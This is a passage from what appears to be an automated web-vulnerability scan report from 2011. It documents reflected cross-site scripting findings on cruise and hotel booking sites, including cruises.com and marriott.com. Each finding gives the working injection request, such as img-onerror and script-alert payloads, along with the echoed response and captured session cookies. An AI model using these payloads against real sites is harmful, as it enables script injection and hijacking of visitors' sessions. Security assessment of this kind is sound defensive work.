Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=000052bP0YHmMBHoM8_sGg4WKHr:12hdbd027; wuc=USA; s_pers=%20s_evar44cvp%3D%255B%255B'Direct%252520Load'%252C'1317646043868'%255D%255D%7C1475498843868%3B%20s_evar46cvp%3D%255B%255B'Direct%252520Load'%252C'1317646043871'%255D%255D%7C1475498843871%3B; s_sess=%20s_cc%3Dtrue%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3Dcelebritycruiseprod%253D%252526pid%25253Dhomepageus%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.celebritycruises.com%2525252Fexplore%2525252Fships%2525252Fdetail.do%2525253FshipCode%2525253DSI%25252526tab%2525253Dsailings%252525252Fexplore%252525252Fships%252525252%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en
Vary: Accept-Encoding
Content-Length: 75029
Date: Mon, 03 Oct 2011 12:47:32 GMT
Connection: close


   <!DOCTYPE html>
<html>
   <head>
       <meta charset="utf-8">
       
           
                           <title>Celebrity Silhouette | Celebrity Cruises</title>
   <meta property="og:ti
...[SNIP]...
<input type="hidden" name="shipCode" value="SI962db"style="x:expression(alert(1))"eaff2cf540f" id="ccHiddenShipCode" />
...[SNIP]...
4.47. http://www.cruises.com/ajaxjson/filterdynamic.do [changedDdl parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cruises.com
Path:   /ajaxjson/filterdynamic.do

Issue detail

The value of the changedDdl request parameter is copied into the HTML document as plain text between tags. The payload a6397<a%20b%3dc>ad3bf2fc630 was submitted in the changedDdl parameter. This input was echoed as a6397<a b=c>ad3bf2fc630 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajaxjson/filterdynamic.do?wdos=3&d=&d2=&porttype=E&SType=P&ptype=c&type=c&shoppingZipCode=Zip+Code&SType=A&clp=1&sort=7&changedDdl=undefineda6397<a%20b%3dc>ad3bf2fc630 HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/json; charset=utf-8
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.cruises.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WTHGeoLocation=CountryCode=US; WDVID=%7BFFB49BDE%2DB2EE%2D4D7A%2DB652%2DA6AA2F06AB63%7D; WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; ASPSESSIONIDAQASDRCS=PFGAFPMACOENMMLEIOFADKLB; NSC_WJQ-DSVJTFT.DPN=ffffffff095b1c9c45525d5f4f58455e445a4a423662; __utmx=229343950.; __utmxx=229343950.; _msuuid_7871bv11074=7200E557-607F-4F1A-82DB-75086671DFA2; __utma=229343950.1971735135.1317645653.1317645653.1317645653.1; __utmb=229343950.3.9.1317645663627; __utmc=229343950; __utmz=229343950.1317645653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=229343950.|1=SearchWidget=Dynamic=1

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:49 GMT
Server: Apache
Set-Cookie: WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; Expires=Thu, 30-Sep-2021 12:42:50 GMT; Path=/
Set-Cookie: IncludeAlumniRates=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: IncludeSeniorRates=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: AlumniCruiseId=false; Expires=Wed, 02-Nov-2011 12:42:50 GMT; Path=/
Set-Cookie: shoppingZipCode="Zip Code"; Expires=Wed, 02-Nov-2011 12:42:50 GMT; Path=/
Set-Cookie: EmailSignupComplete=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: AFF%5FCID=%22%22; Expires=Wed, 02-Nov-2011 12:42:50 GMT; Path=/
Set-Cookie: sid=6383; Path=/
Content-Length: 6744
Content-Type: application/json;charset=UTF-8
Set-Cookie: NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2c45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 12:44:50 GMT;path=/


{"months":[{"key":"ALL","value":"Any"},{"key":"10/1/2011","value":"October 2011"},{"key":"11/1/2011","value":"November 2011"},{"key":"12/1/2011","value":"December 2011"},{"key":"1/1/2012",
...[SNIP]...
","value":"Silversea Cruises"},{"key":"66","value":"Uniworld River Cruises"},{"key":"78","value":"Viking River Cruises"},{"key":"64","value":"Windstar Cruises","disabled":true}],"changedDdl":"undefineda6397<a b=c>ad3bf2fc630","flexibledays":[{"key":"0","value":"Use this exact date"},{"key":"1","value":"One day before or after"},{"key":"2","value":"3 days before or after"},{"key":"3","value":"7 days before or after"},{"key
...[SNIP]...
4.48. http://www.cruises.com/results.do [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cruises.com
Path:   /results.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 364ac'><script>alert(1)</script>5b3c8877f9e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /results.do?searchOrigin=refine&places=ALL&days=ALL&Month=ALL&dd=ALL&d=&d2=&fd=2&c=ALL&v=ALL&p=ALL&shoppingZipCode=10010&IncludeSeniorRates=true&IncludeAlumniRates=true&AlumniCruiseId=44&sort_by=7&Search.x=28&Search.y=17&Search=Search&364ac'><script>alert(1)</script>5b3c8877f9e=1 HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruises.com/promotion/weekend-cruises.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WTHGeoLocation=CountryCode=US; WDVID=%7BFFB49BDE%2DB2EE%2D4D7A%2DB652%2DA6AA2F06AB63%7D; ASPSESSIONIDAQASDRCS=PFGAFPMACOENMMLEIOFADKLB; NSC_WJQ-DSVJTFT.DPN=ffffffff095b1c9c45525d5f4f58455e445a4a423662; _msuuid_7871bv11074=7200E557-607F-4F1A-82DB-75086671DFA2; __utmx=229343950.; __utmxx=229343950.; JSESSIONID=12B50B9A092975EDA676566C18A72E04; WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; AlumniCruiseId=false; shoppingZipCode="Zip Code"; AFF%5FCID=%22%22; sid=6383; NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2c45525d5f4f58455e445a4a423660; __utma=229343950.1971735135.1317645653.1317645653.1317645653.1; __utmb=229343950.13.8.1317645863557; __utmc=229343950; __utmz=229343950.1317645653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=229343950.|1=SearchWidget=Dynamic=1

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 13:10:14 GMT
Server: Apache
Set-Cookie: WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D5315e730651e1fd9e5457225; Expires=Thu, 30-Sep-2021 13:10:18 GMT; Path=/
Set-Cookie: IncludeAlumniRates=true; Expires=Wed, 02-Nov-2011 13:10:18 GMT; Path=/
Set-Cookie: IncludeSeniorRates=true; Expires=Wed, 02-Nov-2011 13:10:18 GMT; Path=/
Set-Cookie: AlumniCruiseId=44; Expires=Wed, 02-Nov-2011 13:10:18 GMT; Path=/
Set-Cookie: shoppingZipCode=10010; Expires=Wed, 02-Nov-2011 13:10:18 GMT; Path=/
Set-Cookie: EmailSignupComplete=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: AFF%5FCID=%22%22%00a1d04; Expires=Wed, 02-Nov-2011 13:10:18 GMT; Path=/
Set-Cookie: sid=6383; Path=/
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d0e45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 13:12:18 GMT;path=/
Cache-Control: private
Content-Length: 177792


<html>
<head profile="http://www.w3.org/2005/10/profile">


           <META NAME="Description" CONTENT="Find the best cruise and vacation deals on the Internet, make cruise and hote
...[SNIP]...
<a id='next' href='/results.do?days=ALL&dd=ALL&d=&Search.x=28&places=ALL&364ac'><script>alert(1)</script>5b3c8877f9e=1&shoppingZipCode=10010&c=ALL&Search=Search&p=ALL&sort_by=7&d2=&v=ALL&fd=2&Search.y=17&IncludeSeniorRates=true&AlumniCruiseId=44&searchOrigin=refine&Month=ALL&IncludeAlumniRates=true&index=2' class="l
...[SNIP]...
4.49. http://www.cruisesonly.com/ajaxjson/filterdynamic.do [changedDdl parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cruisesonly.com
Path:   /ajaxjson/filterdynamic.do

Issue detail

The value of the changedDdl request parameter is copied into the HTML document as plain text between tags. The payload 138e2<a%20b%3dc>1be29e698d6 was submitted in the changedDdl parameter. This input was echoed as 138e2<a b=c>1be29e698d6 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajaxjson/filterdynamic.do?wdos=3&porttype=E&SType=P&ptype=c&type=c&shoppingZipCode=Zip+Code&SType=A&clp=1&sort=7&changedDdl=undefined138e2<a%20b%3dc>1be29e698d6 HTTP/1.1
Host: www.cruisesonly.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/json; charset=utf-8
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.cruisesonly.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d2245525d5f4f58455e445a4a423660; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.2.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:52 GMT
Server: Apache
Set-Cookie: WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D1c8fe390ed9e4354eaa4e6f; Expires=Thu, 30-Sep-2021 12:42:53 GMT; Path=/
Set-Cookie: IncludeAlumniRates=1c8fe3904be4744e95f12c08; Expires=Wed, 02-Nov-2011 12:42:53 GMT; Path=/
Set-Cookie: IncludeSeniorRates=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: AlumniCruiseId=false; Expires=Wed, 02-Nov-2011 12:42:53 GMT; Path=/
Set-Cookie: shoppingZipCode="Zip Code"; Expires=Wed, 02-Nov-2011 12:42:53 GMT; Path=/
Set-Cookie: EmailSignupComplete=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: AFF%5FCID=%22%22; Expires=Wed, 02-Nov-2011 12:42:53 GMT; Path=/
Set-Cookie: sid=6386; Path=/
Content-Length: 6744
Content-Type: application/json;charset=UTF-8
Set-Cookie: NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d2245525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 12:44:53 GMT;path=/


{"months":[{"key":"ALL","value":"Any"},{"key":"10/1/2011","value":"October 2011"},{"key":"11/1/2011","value":"November 2011"},{"key":"12/1/2011","value":"December 2011"},{"key":"1/1/2012",
...[SNIP]...
","value":"Silversea Cruises"},{"key":"66","value":"Uniworld River Cruises"},{"key":"78","value":"Viking River Cruises"},{"key":"64","value":"Windstar Cruises","disabled":true}],"changedDdl":"undefined138e2<a b=c>1be29e698d6","flexibledays":[{"key":"0","value":"Use this exact date"},{"key":"1","value":"One day before or after"},{"key":"2","value":"3 days before or after"},{"key":"3","value":"7 days before or after"},{"key
...[SNIP]...
4.50. http://www.marriott.com/search/submitSearch.mi [clusterCode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.marriott.com
Path:   /search/submitSearch.mi

Issue detail

The value of the clusterCode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f56e8"><img%20src%3da%20onerror%3dalert(1)>d2f0cc2067a was submitted in the clusterCode parameter. This input was echoed as f56e8"><img src=a onerror=alert(1)>d2f0cc2067a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /search/submitSearch.mi?searchType=InCity&groupCode=&searchRadius=50&recordsPerPage=10&vsMarriottBrands=&destinationAddress.city=bos&destinationAddress.stateProvince=&destinationAddress.country=&fromDate=&minDate=10%2F03%2F2011&maxDate=09%2F23%2F2012&monthNames=January%2CFebruary%2CMarch%2CApril%2CMay%2CJune%2CJuly%2CAugust%2CSeptember%2COctober%2CNovember%2CDecember&weekDays=S%2CM%2CT%2CW%2CT%2CF%2CS&dateFormatPattern=M%2Fd%2Fyy&toDate=&populateTodateFromFromDate=true&defaultToDateDays=1&roomCount=1&guestCount=1&marriottRewardsNumber=&clusterCode=nonef56e8"><img%20src%3da%20onerror%3dalert(1)>d2f0cc2067a&corporateCode=&displayableIncentiveType_Number=&marriottBrands=all HTTP/1.1
Host: www.marriott.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.marriott.com/default.mi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000I7eCs-h_jXEOadoR_gF70u5:169bo19ig; JVMID=pEbizMdcomD167_prd1; MI_Visitor=I7eCs-h_jXEOadoR_gF70u5; mbox=check#true#1317646594|session#1317646533235-184575#1317648394|PC#1317646533235-184575.19#1318856136; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; MI_SITE=prod3; fsr.s={"cp":{"TLSessionID":"foreseeJSessionId"},"v":1,"pv":1,"to":3,"c":"http://www.marriott.com/default.mi","lc":{"d4":{"v":1,"s":true}},"cd":4,"sd":4}; s_pers=%20s_lv%3D1317646553781%7C1412254553781%3B%20s_lv_s%3DFirst%2520Visit%7C1317648353781%3B; HDFind=true

Response (redirected)

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Content-Type: text/html; charset=UTF-8
Set-Cookie: JVMID=pEbizMdcomD167_prd1; Path=/
Set-Cookie: MI_SITE=prod3;path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Vary: Accept-Encoding
Content-Language: en-US
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Date: Mon, 03 Oct 2011 12:59:01 GMT
Content-Length: 326400
Connection: close


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   

<html xmlns="http://www.w3.org/1999/x
...[SNIP]...
<a href="http://www.ritzcarlton.com/en/prm/BOSRT/Reservations/Default.htm?mtid=marriott&cc=NONEF56E8"><IMG SRC=A ONERROR=ALERT(1)>D2F0CC2067A&gc=&rn=&locale=en_US&nr=1&ci=&ng=1&co=&ssoAction=false" target="new">
...[SNIP]...
4.51. http://www.marriott.com/search/submitSearch.mi [clusterCode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.marriott.com
Path:   /search/submitSearch.mi

Issue detail

The value of the clusterCode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca38d"><img%20src%3da%20onerror%3dalert(1)>eb73406188b was submitted in the clusterCode parameter. This input was echoed as ca38d"><img src=a onerror=alert(1)>eb73406188b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /search/submitSearch.mi?searchType=InCity&groupCode=&searchRadius=50&recordsPerPage=10&vsMarriottBrands=&destinationAddress.city=bos&destinationAddress.stateProvince=&destinationAddress.country=&fromDate=&minDate=10%2F03%2F2011&maxDate=09%2F23%2F2012&monthNames=January%2CFebruary%2CMarch%2CApril%2CMay%2CJune%2CJuly%2CAugust%2CSeptember%2COctober%2CNovember%2CDecember&weekDays=S%2CM%2CT%2CW%2CT%2CF%2CS&dateFormatPattern=M%2Fd%2Fyy&toDate=&populateTodateFromFromDate=true&defaultToDateDays=1&roomCount=1&guestCount=1&marriottRewardsNumber=&clusterCode=ca38d"><img%20src%3da%20onerror%3dalert(1)>eb73406188b&corporateCode=&displayableIncentiveType_Number=&marriottBrands=all HTTP/1.1
Host: www.marriott.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.marriott.com/default.mi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000I7eCs-h_jXEOadoR_gF70u5:169bo19ig; JVMID=pEbizMdcomD167_prd1; MI_Visitor=I7eCs-h_jXEOadoR_gF70u5; mbox=check#true#1317646594|session#1317646533235-184575#1317648394|PC#1317646533235-184575.19#1318856136; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; MI_SITE=prod3; fsr.s={"cp":{"TLSessionID":"foreseeJSessionId"},"v":1,"pv":1,"to":3,"c":"http://www.marriott.com/default.mi","lc":{"d4":{"v":1,"s":true}},"cd":4,"sd":4}; s_pers=%20s_lv%3D1317646553781%7C1412254553781%3B%20s_lv_s%3DFirst%2520Visit%7C1317648353781%3B; HDFind=true

Response (redirected)

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Content-Type: text/html; charset=UTF-8
Set-Cookie: JVMID=pEbizMdcomD243_prd3; Path=/
Set-Cookie: MI_SITE=prod3;path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Vary: Accept-Encoding
Content-Language: en-US
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Date: Mon, 03 Oct 2011 12:59:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 335102


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   

<html xmlns="http://www.w3.org/1999/x
...[SNIP]...
<iframe src="https://fls.doubleclick.net/activityi;src=1359549;type=count810;cat=marri724;u16=US;u15=1;u12=1;u11=1;u14=;u13=;u10=0;u9=10/3/11;u1=;u19=BOS|MA|US;u20=CA38D"><IMG SRC=A ONERROR=ALERT(1)>EB73406188B;ord=1;num=1?" width=1 height=1 frameborder=0>
...[SNIP]...
4.52. http://www.marriott.com/search/submitSearch.mi [displayableIncentiveType_Number parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.marriott.com
Path:   /search/submitSearch.mi

Issue detail

The value of the displayableIncentiveType_Number request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2b10"><img%20src%3da%20onerror%3dalert(1)>146ee02219e was submitted in the displayableIncentiveType_Number parameter. This input was echoed as d2b10"><img src=a onerror=alert(1)>146ee02219e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /search/submitSearch.mi?searchType=InCity&groupCode=&searchRadius=50&recordsPerPage=10&vsMarriottBrands=&destinationAddress.city=bos&destinationAddress.stateProvince=&destinationAddress.country=&fromDate=&minDate=10%2F03%2F2011&maxDate=09%2F23%2F2012&monthNames=January%2CFebruary%2CMarch%2CApril%2CMay%2CJune%2CJuly%2CAugust%2CSeptember%2COctober%2CNovember%2CDecember&weekDays=S%2CM%2CT%2CW%2CT%2CF%2CS&dateFormatPattern=M%2Fd%2Fyy&toDate=&populateTodateFromFromDate=true&defaultToDateDays=1&roomCount=1&guestCount=1&marriottRewardsNumber=&clusterCode=none&corporateCode=&displayableIncentiveType_Number=d2b10"><img%20src%3da%20onerror%3dalert(1)>146ee02219e&marriottBrands=all HTTP/1.1
Host: www.marriott.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.marriott.com/default.mi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000I7eCs-h_jXEOadoR_gF70u5:169bo19ig; JVMID=pEbizMdcomD167_prd1; MI_Visitor=I7eCs-h_jXEOadoR_gF70u5; mbox=check#true#1317646594|session#1317646533235-184575#1317648394|PC#1317646533235-184575.19#1318856136; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; MI_SITE=prod3; fsr.s={"cp":{"TLSessionID":"foreseeJSessionId"},"v":1,"pv":1,"to":3,"c":"http://www.marriott.com/default.mi","lc":{"d4":{"v":1,"s":true}},"cd":4,"sd":4}; s_pers=%20s_lv%3D1317646553781%7C1412254553781%3B%20s_lv_s%3DFirst%2520Visit%7C1317648353781%3B; HDFind=true

Response (redirected)

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Content-Type: text/html; charset=UTF-8
Set-Cookie: JVMID=pEbizMdcomD167_prd1; Path=/
Set-Cookie: MI_SITE=prod3;path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Vary: Accept-Encoding
Content-Language: en-US
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Date: Mon, 03 Oct 2011 12:59:31 GMT
Content-Length: 325973
Connection: close


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   

<html xmlns="http://www.w3.org/1999/x
...[SNIP]...
<input id="hd_incentivesType_Number" type="hidden" value="d2b10"><img src=a onerror=alert(1)>146ee02219e" />
...[SNIP]...
4.53. http://www.marriott.com/search/submitSearch.mi [fromDate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.marriott.com
Path:   /search/submitSearch.mi

Issue detail

The value of the fromDate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e560"><img%20src%3da%20onerror%3dalert(1)>0a08f5e4844 was submitted in the fromDate parameter. This input was echoed as 6e560"><img src=a onerror=alert(1)>0a08f5e4844 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/submitSearch.mi?searchType=InCity&groupCode=&searchRadius=50&recordsPerPage=10&vsMarriottBrands=&destinationAddress.city=bos&destinationAddress.stateProvince=&destinationAddress.country=&fromDate=6e560"><img%20src%3da%20onerror%3dalert(1)>0a08f5e4844&minDate=10%2F03%2F2011&maxDate=09%2F23%2F2012&monthNames=January%2CFebruary%2CMarch%2CApril%2CMay%2CJune%2CJuly%2CAugust%2CSeptember%2COctober%2CNovember%2CDecember&weekDays=S%2CM%2CT%2CW%2CT%2CF%2CS&dateFormatPattern=M%2Fd%2Fyy&toDate=&populateTodateFromFromDate=true&defaultToDateDays=1&roomCount=1&guestCount=1&marriottRewardsNumber=&clusterCode=none&corporateCode=&displayableIncentiveType_Number=&marriottBrands=all HTTP/1.1
Host: www.marriott.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.marriott.com/default.mi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000I7eCs-h_jXEOadoR_gF70u5:169bo19ig; JVMID=pEbizMdcomD167_prd1; MI_Visitor=I7eCs-h_jXEOadoR_gF70u5; mbox=check#true#1317646594|session#1317646533235-184575#1317648394|PC#1317646533235-184575.19#1318856136; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; MI_SITE=prod3; fsr.s={"cp":{"TLSessionID":"foreseeJSessionId"},"v":1,"pv":1,"to":3,"c":"http://www.marriott.com/default.mi","lc":{"d4":{"v":1,"s":true}},"cd":4,"sd":4}; s_pers=%20s_lv%3D1317646553781%7C1412254553781%3B%20s_lv_s%3DFirst%2520Visit%7C1317648353781%3B; HDFind=true

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Content-Type: text/html; charset=UTF-8
Set-Cookie: JVMID=pEbizMdcomD244_prd3; Path=/
Set-Cookie: MI_SITE=prod3;path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Vary: Accept-Encoding
Content-Language: en-US
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Date: Mon, 03 Oct 2011 12:57:42 GMT
Content-Length: 174403
Connection: close


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   

<html xmlns="http://www.w3.org/1999/x
...[SNIP]...
<input type="text" name="fromDate" id="global-header-hotel-fromDate" value="6e560"><img src=a onerror=alert(1)>0a08f5e4844" maxlength="10" class="calendar-module-fromdate search-fromDate" />
...[SNIP]...
4.54. http://www.marriott.com/search/submitSearch.mi [toDate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.marriott.com
